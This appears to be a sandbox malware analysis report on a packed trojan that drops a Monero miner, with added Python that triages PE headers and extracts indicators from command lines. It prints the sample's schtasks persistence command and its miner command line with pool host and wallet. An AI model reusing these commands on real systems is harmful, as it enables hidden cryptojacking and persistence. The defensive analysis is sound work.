Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000003.237103950.0000000000F40000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284646419.0000000006030000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280825476.0000000001100000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Binary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: Section: ZLIB complexity 0.989800347222
Source: WinRing0x64.sys.6.dr | Binary string: \Device\WinRing0_1_2_0
Source: classification engine | Classification label: mal100.troj.evad.mine.winEXE@13/9@9/5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File created: C:\Users\user\AppData\Local\pg2bsuqa.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Mutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Metadefender: Detection: 21%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | ReversingLabs: Detection: 28%
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static file information: File size 2817248 > 1048576
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x2a7200
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb | source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: WinRing0x64.sys.6.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe.2e0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Unpacked PE file: 6.2.zmql3v0y.exe.b30000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Unpacked PE file: 15.2.RantimeBroker.exe.d80000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xEEB543EE [Tue Nov 27 12:13:34 2096 UTC]
Source: initial sample | Static PE information: section where entry point is pointing to: .boot
Source: zmql3v0y.exe.0.dr | Static PE information: real checksum: 0x280d9c should be: 0x285c9a
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: real checksum: 0x2b2b3a should be: 0x2b9e3b
Source: RantimeBroker.exe.6.dr | Static PE information: real checksum: 0x280d9c should be: 0x285c9a
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: (special characters, not rendered)
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: (special characters, not rendered)
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: (special characters, not rendered)
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: .themida
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: section name: .boot
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .apk0
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .themida
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .boot
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .apk1
Source: pg2bsuqa.exe.0.dr | Static PE information: section name: .apk2
Source: zmql3v0y.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: zmql3v0y.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: zmql3v0y.exe.0.dr | Static PE information: section name: (special characters, not rendered)
Source: zmql3v0y.exe.0.dr | Static PE information: section name: .themida
Source: zmql3v0y.exe.0.dr | Static PE information: section name: .boot
Source: RantimeBroker.exe.6.dr | Static PE information: section name: (special characters, not rendered)
Source: RantimeBroker.exe.6.dr | Static PE information: section name: (special characters, not rendered)
Source: RantimeBroker.exe.6.dr | Static PE information: section name: (special characters, not rendered)
Source: RantimeBroker.exe.6.dr | Static PE information: section name: .themida
Source: RantimeBroker.exe.6.dr | Static PE information: section name: .boot
Source: cpu.exe.6.dr | Static PE information: section name: _RANDOMX
Source: cpu.exe.6.dr | Static PE information: section name: _SHA3_25
Source: cpu.exe.6.dr | Static PE information: section name: _TEXT_CN
Source: cpu.exe.6.dr | Static PE information: section name: _TEXT_CN
Source: cpu.exe.6.dr | Static PE information: section name: _RDATA
Source: cpu.exe.6.dr | Static PE information: section name: 0
Source: cpu.exe.6.dr | Static PE information: section name: 1
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Code function: 4_2_003D8570 push ecx; ret | 4_2_003D8585
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Code function: 15_2_03CA0007 push es; retf 0003h | 15_2_03CA001E
Source: initial sample | Static PE information: section name: (not rendered) entropy: 7.58163620158
Source: initial sample | Static PE information: section name: (not rendered) entropy: 7.89210158409
Source: initial sample | Static PE information: section name: (not rendered) entropy: 7.89210158409
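The static indicators the report lists for this sample (a link timestamp in 2096, three sections whose names are unprintable, a .themida/.boot pair with the entry point inside .boot, a header checksum that does not verify, and a dropped file with more than ten sections) are all cheap to check on any PE before detonation. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it builds a small constructed PE32 header in memory that mimics this sample's layout (the section names, the 0xEEB543EE timestamp and the bogus 0x2b2b3a checksum are taken from the report; every other header field is an assumption), parses the headers with struct alone, and returns those findings. The checksum routine reimplements the algorithm pefile uses in generate_checksum; the "now" the timestamp is compared against is a parameter so the check stays reproducible.

```python
import struct
import time
from datetime import datetime, timezone

# Section names the report shows for the Themida-protected stages of this sample.
PACKER_SECTIONS = {b".themida", b".boot"}


def build_pe(section_names, timestamp, checksum=0, entry_rva=0x1000):
    """Constructed minimal PE32 image (DOS header, PE signature, COFF header,
    224-byte optional header, section table). Not loadable; it only carries the
    fields the triage below reads. Offsets follow the PE/COFF specification."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 60, 64)                      # e_lfanew: PE header at 64
    coff = struct.pack("<HHIIIHH", 0x014C, len(section_names), timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                    # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)               # AddressOfEntryPoint
    struct.pack_into("<I", opt, 64, checksum)                # CheckSum
    sections = b""
    for i, name in enumerate(section_names):
        sections += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"),
                                0x1000, 0x1000 * (i + 1), 0x200, 0, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections


def pe_checksum(data, checksum_off):
    """PE CheckSum as pefile.generate_checksum computes it: a 16-bit one's-complement
    sum over the file with the CheckSum field skipped, plus the file length.
    Assumes len(data) is a multiple of 4, which holds for build_pe() output."""
    total = 0
    for off in range(0, len(data), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", data, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def triage_pe(data, now=None):
    """Return the header-level findings the report raises for this sample."""
    now = time.time() if now is None else now
    findings = []
    if data[:2] != b"MZ":
        return ["not a PE file (no MZ)"]
    e_lfanew = struct.unpack_from("<I", data, 60)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return ["not a PE file (no PE signature)"]
    _, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]
    checksum_off = opt_off + 64                               # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    # A link time later than "now" cannot be genuine; this sample claims 2096.
    if ts > now + 86400:
        when = datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        findings.append(f"suspicious timestamp 0x{ts:08X} ({when}) lies in the future")
    if nsec > 10:
        findings.append(f"{nsec} sections (> 10)")
    entry_section = None
    for i in range(nsec):
        name, vsize, va, rsize = struct.unpack_from("<8sIII", data, opt_off + opt_size + 40 * i)
        name = name.rstrip(b"\0")
        # Empty names or bytes outside printable ASCII are what the report calls "special chars".
        if not name or any(b < 0x21 or b > 0x7E for b in name):
            findings.append(f"section {i} name {name!r} contains special chars")
        if name in PACKER_SECTIONS:
            findings.append(f"packer section {name.decode()}")
        if va <= entry < va + max(vsize, rsize):
            entry_section = name
    if entry_section is not None and entry_section != b".text":
        findings.append(f"entry point in section {entry_section.decode('latin-1')!r}")
    # Unsigned files often carry 0; a non-zero value that does not verify means the
    # header was rewritten after linking (report: 0x2b2b3a should be 0x2b9e3b).
    if stored and stored != pe_checksum(data, checksum_off):
        findings.append(f"checksum 0x{stored:x} should be 0x{pe_checksum(data, checksum_off):x}")
    return findings


# Constructed sample mimicking the initial sample's section layout as reported above.
SAMPLE = build_pe([b"\x01\x02\x03", b"  ", b"\x7f", b".idata", b".rsrc", b".themida", b".boot"],
                  timestamp=0xEEB543EE, checksum=0x2B2B3A, entry_rva=0x7010)

if __name__ == "__main__":
    for line in triage_pe(SAMPLE):
        print(line)
```

On a real file, replace SAMPLE with the file's bytes (the checksum routine then needs the 4-byte padding pefile adds for files whose length is not a multiple of 4). The entry-point check is deliberately loose: a packer stub entering in .boot is what Themida does here, but any non-.text entry section deserves a look.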

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File created: C:\Users\user\AppData\Local\zmql3v0y.exe
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File created: C:\Users\user\AppData\Local\pg2bsuqa.exe
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process information set: NOOPENFILEERRORBOX
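Two of the process creations in this report carry the whole persistence and monetisation story. The schtasks.exe line registers a task named 'Windows Service Microsoft Corporation' that re-launches RantimeBroker.exe from AppData\Roaming every minute (/sc MINUTE /mo 1), which is watchdog-style persistence under a name chosen to pass for a Windows component. The cpu.exe line is an unmodified xmrig-style command line that names the Stratum pool (pool.minexmr.com:4444), the algorithm (cn/r) and the payout address. The Python below is an added example, not code from the report or from the sample: it tokenises the sandbox's rendering of those command lines (copied from the report above as constructed input, single quotes and all) and pulls out the indicators a responder would block or hunt on. The list of user-writable paths, the five-minute watchdog threshold and the Monero standard-address shape check are assumptions of the example, not findings of the report.

```python
import re
from pathlib import PureWindowsPath

# Constructed input: the "Process created" command lines from this report, with the
# single-quote rendering the sandbox uses. Nothing here was captured by this example.
SAMPLE_CMDLINES = [
    r"'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'",
    r"'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f",
    r"'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1",
    r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
]

# Assumptions of this example: paths a standard user can write to, the repeat interval
# below which a task looks like a watchdog, and the Monero standard-address shape
# (95 base58 characters starting with 4).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
WATCHDOG_MINUTES = 5
MONERO_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")


def split_cmdline(cmd):
    """Split on whitespace, honouring single and double quotes. No backslash escapes,
    so Windows paths survive intact (shlex in POSIX mode would swallow them)."""
    tokens, cur, quote = [], "", None
    for ch in cmd:
        if quote:
            if ch == quote:
                quote = None
            else:
                cur += ch
        elif ch in "'\"":
            quote = ch
        elif ch.isspace():
            if cur:
                tokens.append(cur)
            cur = ""
        else:
            cur += ch
    if cur:
        tokens.append(cur)
    return tokens


def triage_schtasks(argv):
    """Flag a schtasks /create that re-runs a user-writable binary every few minutes."""
    if not any(t.lower() == "/create" for t in argv):
        return None
    opts = {}
    for i in range(1, len(argv) - 1):           # /switch value pairs; bare switches skipped
        if argv[i].startswith("/") and not argv[i + 1].startswith("/"):
            opts[argv[i].lower()] = argv[i + 1]
    task, action = opts.get("/tn", ""), opts.get("/tr", "")
    findings = []
    if (opts.get("/sc", "").upper() == "MINUTE" and opts.get("/mo", "").isdigit()
            and int(opts["/mo"]) <= WATCHDOG_MINUTES):
        findings.append(f"re-launches every {opts['/mo']} minute(s) (watchdog persistence)")
    if any(p in action.lower() for p in USER_WRITABLE):
        findings.append(f"task action runs from a user-writable path: {action}")
    if "microsoft" in task.lower() or "windows" in task.lower():
        findings.append(f"task name imitates a Windows component: {task!r}")
    return {"kind": "schtasks", "task": task, "action": action, "findings": findings}


def triage_miner(argv):
    """Pull pool, algorithm and payout address out of an xmrig-style command line."""
    opts, i = {}, 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--") and "=" in tok:  # --key=value
            key, val = tok.split("=", 1)
            opts[key] = val
        elif tok.startswith("-") and i + 1 < len(argv):  # -k value / --key value
            opts[tok] = argv[i + 1]
            i += 1
        i += 1
    pool = opts.get("-o") or opts.get("--url") or ""
    if not pool.startswith(("stratum+tcp://", "stratum+ssl://")):
        return None
    host, _, port = pool.split("://", 1)[1].rpartition(":")
    user = opts.get("-u") or opts.get("--user") or ""
    wallet = user.split(".", 1)[0]            # xmrig accepts wallet[.worker-id]
    algo = opts.get("--algo") or opts.get("-a")
    findings = [f"connects to Stratum mining pool {host}:{port}"]
    if algo:
        findings.append(f"mining algorithm {algo}")
    if MONERO_ADDR.match(wallet):
        findings.append("payout address has the Monero standard-address shape")
    if "--donate-level" in opts:
        findings.append(f"xmrig-style --donate-level={opts['--donate-level']}")
    return {"kind": "miner", "pool": f"{host}:{port}", "wallet": wallet,
            "algo": algo, "findings": findings}


def triage_cmdline(cmd):
    """Route one process-creation command line to the matching check."""
    argv = split_cmdline(cmd)
    if not argv:
        return None
    if PureWindowsPath(argv[0]).name.lower() == "schtasks.exe":
        return triage_schtasks(argv)
    return triage_miner(argv)


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        result = triage_cmdline(cmd)
        if result:
            print(result["kind"], *result["findings"], sep="\n  ")
```

Feed it the CommandLine field of Sysmon event 1 or Windows 4688 records and the two hits are exactly the task to delete (schtasks /delete /tn with the extracted name) and the pool host and wallet to block and pivot on; the conhost.exe line and the bare dropper launch correctly produce nothing.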